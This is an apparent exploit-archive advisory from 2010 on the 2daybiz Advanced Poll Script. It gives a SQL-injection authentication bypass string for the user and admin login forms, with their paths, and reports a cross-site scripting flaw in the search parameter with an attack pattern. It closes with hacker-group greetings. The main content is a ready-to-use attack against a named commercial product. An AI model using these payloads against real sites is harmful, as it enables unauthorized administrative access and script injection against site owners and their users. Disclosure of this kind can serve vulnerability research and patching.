2daybiz Advanced Poll Script XSS and Authentication Bypass

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 2daybiz Advanced Poll Script XSS and Authentication Bypass
# Published : 2010-04-26
# Author : Sid3^effects
# Previous Title : Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability
# Next Title : OpenCominterne 1.01 Local File Include Vulnerability

______________________________________________________________________________
                         XSS and Authentication bypass in Advanced Poll Script
                                    Vendor:http://www.2daybiz.com/    ___________________________Author:Sid3^effects_________________________________
  

Description :

Advanced Poll is a polling system with powerful administration tool supports both text file and MySQL database. Its features include multiple polls, unlimited options, IP-Logging, IP-Locking, cookie support, comment feature, vote expire feature, and random poll support. 

script cost :$140
---------------------------------------------------------------------------
    * Authentication bypass:

    The following script has authentication bypass in the admin login as well as in user login 

    use ' or 1=1 or ''=' in both login and password.

user login  demo :http://server/polls/login.php
admin login demo: http://server/polls/admin/
---------------------------------------------------------------------------
    * XSS (cross site scripting ) :
       
    XSS is also found in the search field. 


 Attack Pattern: '"--> 

 DEMO:http://server/polls/index_search.php?category= [XSS]
---------------------------------------------------------------------------

ShoutZ :
------- 
               ---Indian Cyber warriors--Andhra hackers-- 

Greetz :
--------
 ---*L0rd ?rusAdêr*---d4rk-blu?? [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr--